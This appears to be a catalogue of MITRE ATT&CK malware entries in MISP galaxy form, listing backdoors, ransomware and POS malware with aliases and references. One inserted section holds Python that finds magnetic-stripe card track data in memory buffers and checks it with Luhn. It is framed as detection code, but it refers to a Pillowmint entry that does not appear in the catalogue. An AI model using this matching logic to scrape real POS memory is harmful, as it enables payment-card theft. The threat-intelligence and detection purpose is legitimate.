[DarkTortilla](https://attack.mitre.org/software/S1066) is a highly configurable .NET-based crypter that has possibly been active since at least August 2015. [DarkTortilla](https://attack.mitre.org/software/S1066) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://attack.mitre.org/software/S0331), AsyncRat, [NanoCore](https://attack.mitre.org/software/S0336), RedLine, [Cobalt Strike](https://attack.mitre.org/software/S0154), and Metasploit.(Citation: Secureworks DarkTortilla Aug 2022)

The tag is: misp-galaxy:mitre-malware="DarkTortilla - S1066"

DarkTortilla - S1066 is also known as:

  • DarkTortilla

Table 7550. Table References

Links

https://attack.mitre.org/software/S1066

https://www.secureworks.com/research/darktortilla-malware-analysis

FoggyWeb - S0661

[FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021)

The tag is: misp-galaxy:mitre-malware="FoggyWeb - S0661"

FoggyWeb - S0661 is also known as:

  • FoggyWeb

Table 7551. Table References

Links

https://attack.mitre.org/software/S0661

https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/

QUIETCANARY - S1076

[QUIETCANARY](https://attack.mitre.org/software/S1076) is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.(Citation: Mandiant Suspected Turla Campaign February 2023)

The tag is: misp-galaxy:mitre-malware="QUIETCANARY - S1076"

QUIETCANARY - S1076 is also known as:

  • QUIETCANARY

  • Tunnus

Table 7552. Table References

Links

https://attack.mitre.org/software/S1076

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

FluBot - S1067

[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)

The tag is: misp-galaxy:mitre-malware="FluBot - S1067"

FluBot - S1067 is also known as:

  • FluBot

Table 7553. Table References

Links

https://attack.mitre.org/software/S1067

https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/

https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon

HELLOKITTY - S0617

[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020; targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)

The tag is: misp-galaxy:mitre-malware="HELLOKITTY - S0617"

HELLOKITTY - S0617 is also known as:

  • HELLOKITTY

Table 7554. Table References

Links

https://attack.mitre.org/software/S0617

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

Matryoshka - S0167

[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)

The tag is: misp-galaxy:mitre-malware="Matryoshka - S0167"

Matryoshka - S0167 is also known as:

  • Matryoshka

Matryoshka - S0167 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7555. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

https://attack.mitre.org/software/S0167

https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

Tomiris - S0671

[Tomiris](https://attack.mitre.org/software/S0671) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://attack.mitre.org/software/S0671) and [GoldMax](https://attack.mitre.org/software/S0588).(Citation: Kaspersky Tomiris Sep 2021)

The tag is: misp-galaxy:mitre-malware="Tomiris - S0671"

Tomiris - S0671 is also known as:

  • Tomiris

Table 7556. Table References

Links

https://attack.mitre.org/software/S0671

https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/

Wingbird - S0176

[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)

The tag is: misp-galaxy:mitre-malware="Wingbird - S0176"

Wingbird - S0176 is also known as:

  • Wingbird

Wingbird - S0176 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"

Table 7557. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/software/S0176

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha

FIVEHANDS - S0618

[FIVEHANDS](https://attack.mitre.org/software/S0618) is a customized version of [DEATHRANSOM](https://attack.mitre.org/software/S0616) ransomware written in C++. [FIVEHANDS](https://attack.mitre.org/software/S0618) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://attack.mitre.org/software/S0615).(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)

The tag is: misp-galaxy:mitre-malware="FIVEHANDS - S0618"

FIVEHANDS - S0618 is also known as:

  • FIVEHANDS

Table 7558. Table References

Links

https://attack.mitre.org/software/S0618

https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

BlackCat - S1068

[BlackCat](https://attack.mitre.org/software/S1068) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://attack.mitre.org/software/S1068) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)(Citation: ACSC BlackCat Apr 2022)

The tag is: misp-galaxy:mitre-malware="BlackCat - S1068"

BlackCat - S1068 is also known as:

  • BlackCat

  • ALPHV

  • Noberus

Table 7559. Table References

Links

https://attack.mitre.org/software/S1068

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://www.cyber.gov.au/about-us/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat

https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

DownPaper - S0186

[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)

The tag is: misp-galaxy:mitre-malware="DownPaper - S0186"

DownPaper - S0186 is also known as:

  • DownPaper

DownPaper - S0186 has relationships with:

  • similar: misp-galaxy:malpedia="DownPaper" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7560. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/software/S0186

Gazer - S0168

[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-malware="Gazer - S0168"

Gazer - S0168 is also known as:

  • Gazer

  • WhiteBear

Gazer - S0168 has relationships with:

  • similar: misp-galaxy:malpedia="Gazer" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7561. Table References

Links

https://attack.mitre.org/software/S0168

https://securelist.com/introducing-whitebear/81638/

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

Lizar - S0681

[Lizar](https://attack.mitre.org/software/S0681) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://attack.mitre.org/software/S0030). It has likely been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least February 2021.(Citation: BiZone Lizar May 2021)(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021)

The tag is: misp-galaxy:mitre-malware="Lizar - S0681"

Lizar - S0681 is also known as:

  • Lizar

  • Tirion

Table 7562. Table References

Links

https://attack.mitre.org/software/S0681

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

https://geminiadvisory.io/fin7-ransomware-bastion-secure/

https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/

PUNCHBUGGY - S0196

[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: misp-galaxy:mitre-malware="PUNCHBUGGY - S0196"

PUNCHBUGGY - S0196 is also known as:

  • PUNCHBUGGY

  • ShellTea

PUNCHBUGGY - S0196 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 7563. Table References

Links

http://blog.morphisec.com/security-alert-fin8-is-back

https://attack.mitre.org/software/S0196

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

TangleBot - S1069

[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)

The tag is: misp-galaxy:mitre-malware="TangleBot - S1069"

TangleBot - S1069 is also known as:

  • TangleBot

Table 7564. Table References

Links

https://attack.mitre.org/software/S1069

https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19

Neoichor - S0691

[Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021)

The tag is: misp-galaxy:mitre-malware="Neoichor - S0691"

Neoichor - S0691 is also known as:

  • Neoichor

Table 7565. Table References

Links

https://attack.mitre.org/software/S0691

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe

RawPOS - S0169

[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: misp-galaxy:mitre-malware="RawPOS - S0169"

RawPOS - S0169 is also known as:

  • RawPOS

  • FIENDCRY

  • DUEBREW

  • DRIFTWOOD

RawPOS - S0169 has relationships with:

  • similar: misp-galaxy:malpedia="RawPOS" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 7566. Table References

Links

http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf

https://attack.mitre.org/software/S0169

https://github.com/DiabloHorn/mempdump

https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware

https://www.youtube.com/watch?v=fevGZs0EQu8

Hornbill - S1077

[Hornbill](https://attack.mitre.org/software/S1077) is one of two mobile malware families known to be used by the APT [Confucius](https://attack.mitre.org/groups/G0142). Analysis suggests that [Hornbill](https://attack.mitre.org/software/S1077) was first active in early 2018. While [Hornbill](https://attack.mitre.org/software/S1077) and [Sunbird](https://attack.mitre.org/software/S1082) overlap in core capabilities, [Hornbill](https://attack.mitre.org/software/S1077) has tools and behaviors suggesting more passive reconnaissance.(Citation: lookout_hornbill_sunbird_0221)

The tag is: misp-galaxy:mitre-malware="Hornbill - S1077"

Hornbill - S1077 is also known as:

  • Hornbill

Table 7567. Table References

Links

https://attack.mitre.org/software/S1077

https://www.lookout.com/blog/lookout-discovers-novel-confucius-apt-android-spyware-linked-to-india-pakistan-conflict

Daserf - S0187

[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)

The tag is: misp-galaxy:mitre-malware="Daserf - S0187"

Daserf - S0187 is also known as:

  • Daserf

  • Muirim

  • Nioupale

Daserf - S0187 has relationships with:

  • similar: misp-galaxy:malpedia="Daserf" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7568. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

https://attack.mitre.org/software/S0187

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

RotaJakiro - S1078

[RotaJakiro](https://attack.mitre.org/software/S1078) is a 64-bit Linux backdoor used by [APT32](https://attack.mitre.org/groups/G0050). First seen in 2018, it uses a plugin architecture to extend capabilities. [RotaJakiro](https://attack.mitre.org/software/S1078) can determine its permission level and execute according to access type (root or user).(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: netlab360 rotajakiro vs oceanlotus)

The tag is: misp-galaxy:mitre-malware="RotaJakiro - S1078"

RotaJakiro - S1078 is also known as:

  • RotaJakiro

Table 7569. Table References

Links

https://attack.mitre.org/software/S1078

https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

Truvasys - S0178

[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)

The tag is: misp-galaxy:mitre-malware="Truvasys - S0178"

Truvasys - S0178 is also known as:

  • Truvasys

Truvasys - S0178 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7570. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/software/S0178

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha

PUNCHTRACK - S0197

[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: misp-galaxy:mitre-malware="PUNCHTRACK - S0197"

PUNCHTRACK - S0197 is also known as:

  • PUNCHTRACK

  • PSVC

PUNCHTRACK - S0197 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 7571. Table References

Links

https://attack.mitre.org/software/S0197

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html
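
The POS families in this section (RawPOS, Pillowmint and PUNCHTRACK above) all scrape payment card data by reading process memory and matching the magnetic-stripe track layouts; the same pattern match plus a Luhn check is what a defender's memory-scan, DLP or hunting rule keys on. The following is an added example of that matching logic, not code from any of these families or from the cited reports. It runs over a byte buffer constructed inline (standing in for a memory dump), the PANs in it are standard test numbers, and the track regexes assume the common Track 1 (%B...^...^...?) and Track 2 (;...=...?) encodings.

```python
import re


def luhn_valid(pan):
    """Luhn (mod 10) check: real PANs pass, most random digit runs do not."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


# Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary>?
# Track 2: ;<PAN>=<YYMM><service code><discretionary>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})(\d{3})([^?]*)\?")
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")


def mask_pan(pan):
    """Keep BIN and last four so a hit can be triaged without logging the full PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_for_track_data(buf):
    """Return every track-formatted record in buf, ordered by offset."""
    hits = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode()
        hits.append({"track": 1, "offset": m.start(), "pan_masked": mask_pan(pan),
                     "expiry": m.group(3).decode(), "luhn_valid": luhn_valid(pan)})
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode()
        hits.append({"track": 2, "offset": m.start(), "pan_masked": mask_pan(pan),
                     "expiry": m.group(2).decode(), "luhn_valid": luhn_valid(pan)})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed stand-in for a slice of POS process memory: two valid records,
# one Luhn-invalid Track 2 record, and a 16-digit order id with no sentinels
# that must not be reported.
SAMPLE_MEMORY = (
    b"\x00\x00POSAPP v2.1\x00\x00"
    b"%B4111111111111111^DOE/JOHN^2512101000000000000?"
    b"\x00logfile=C:\\pos\\trans.log\x00"
    b";5555555555554444=25121010000000000000?"
    b"\x00"
    b";4111111111111112=2512101?"
    b"\x00 order id 1234567890123456 \x00"
)


if __name__ == "__main__":
    for hit in scan_for_track_data(SAMPLE_MEMORY):
        print(hit)
```

Luhn-invalid hits are kept but flagged rather than dropped: in a hunt they are useful evidence that a scraper is present (test data, partial reads), while in a DLP context only Luhn-valid hits are worth alerting on. To run this against a live process you would feed it the output of a memory reader (for example ReadProcessMemory over each committed region on Windows); that part is outside the example.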

BOULDSPY - S1079

[BOULDSPY](https://attack.mitre.org/software/S1079) is an Android malware, detected in early 2023, with surveillance and remote-control capabilities. Analysis of exfiltrated C2 data suggests that [BOULDSPY](https://attack.mitre.org/software/S1079) primarily targeted minority groups in Iran.(Citation: lookout_bouldspy_0423)

The tag is: misp-galaxy:mitre-malware="BOULDSPY - S1079"

BOULDSPY - S1079 is also known as:

  • BOULDSPY

Table 7572. Table References

Links

https://attack.mitre.org/software/S1079

https://www.lookout.com/blog/iranian-spyware-bouldspy

Disco - S1088

[Disco](https://attack.mitre.org/software/S1088) is a custom implant that has been used by [MoustachedBouncer](https://attack.mitre.org/groups/G1019) since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-malware="Disco - S1088"

Disco - S1088 is also known as:

  • Disco

Table 7573. Table References

Links

https://attack.mitre.org/software/S1088

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Starloader - S0188

[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)

The tag is: misp-galaxy:mitre-malware="Starloader - S0188"

Starloader - S0188 is also known as:

  • Starloader

Starloader - S0188 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 7574. Table References

Links

https://attack.mitre.org/software/S0188

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

SharpDisco - S1089

[SharpDisco](https://attack.mitre.org/software/S1089) is a dropper developed in C# that has been used by [MoustachedBouncer](https://attack.mitre.org/groups/G1019) since at least 2020 to load malicious plugins.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-malware="SharpDisco - S1089"

SharpDisco - S1089 is also known as:

  • SharpDisco

Table 7575. Table References

Links

https://attack.mitre.org/software/S1089

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

NETWIRE - S0198

[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-malware="NETWIRE - S0198"

NETWIRE - S0198 is also known as:

  • NETWIRE

NETWIRE - S0198 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7576. Table References

Links

https://attack.mitre.org/software/S0198

https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/

https://www.brighttalk.com/webcast/10703/275683

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

ISMInjector - S0189

[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)

The tag is: misp-galaxy:mitre-malware="ISMInjector - S0189"

ISMInjector - S0189 is also known as:

  • ISMInjector

ISMInjector - S0189 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7577. Table References

Links

https://attack.mitre.org/software/S0189

https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/

TURNEDUP - S0199

[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-malware="TURNEDUP - S0199"

TURNEDUP - S0199 is also known as:

  • TURNEDUP

TURNEDUP - S0199 has relationships with:

  • similar: misp-galaxy:malpedia="TURNEDUP" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7578. Table References

Links

https://attack.mitre.org/software/S0199

https://www.brighttalk.com/webcast/10703/275683

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

CCBkdr - S0222

[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner’s distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)

The tag is: misp-galaxy:mitre-malware="CCBkdr - S0222"

CCBkdr - S0222 is also known as:

  • CCBkdr

CCBkdr - S0222 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

Table 7579. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/

https://attack.mitre.org/software/S0222

POWERSTATS - S0223

[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)

The tag is: misp-galaxy:mitre-malware="POWERSTATS - S0223"

POWERSTATS - S0223 is also known as:

  • POWERSTATS

  • Powermud

POWERSTATS - S0223 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7580. Table References

Links

https://attack.mitre.org/software/S0223

https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

HummingBad - S0322

[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)

The tag is: misp-galaxy:mitre-malware="HummingBad - S0322"

HummingBad - S0322 is also known as:

  • HummingBad

HummingBad - S0322 has relationships with:

  • similar: misp-galaxy:android="HummingBad" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452" with estimative-language:likelihood-probability="almost-certain"

Table 7581. Table References

Links

http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/

https://attack.mitre.org/software/S0322

HOMEFRY - S0232

[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="HOMEFRY - S0232"

HOMEFRY - S0232 is also known as:

  • HOMEFRY

HOMEFRY - S0232 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7582. Table References

Links

https://attack.mitre.org/software/S0232

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

SynAck - S0242

[SynAck](https://attack.mitre.org/software/S0242) is a variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)

The tag is: misp-galaxy:mitre-malware="SynAck - S0242"

SynAck - S0242 is also known as:

  • SynAck

Table 7583. Table References

Links

https://attack.mitre.org/software/S0242

https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging

Anubis - S0422

[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan.(Citation: Cofense Anubis)

The tag is: misp-galaxy:mitre-malware="Anubis - S0422"

Anubis - S0422 is also known as:

  • Anubis

Table 7584. Table References

Links

https://attack.mitre.org/software/S0422

https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/

Exobot - S0522

[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)

The tag is: misp-galaxy:mitre-malware="Exobot - S0522"

Exobot - S0522 is also known as:

  • Exobot

  • Marcher

Table 7585. Table References

Links

https://attack.mitre.org/software/S0522

https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks

https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html

AppleSeed - S0622

[AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)

The tag is: misp-galaxy:mitre-malware="AppleSeed - S0622"

AppleSeed - S0622 is also known as:

  • AppleSeed

Table 7586. Table References

Links

https://attack.mitre.org/software/S0622

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

NDiskMonitor - S0272

[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)

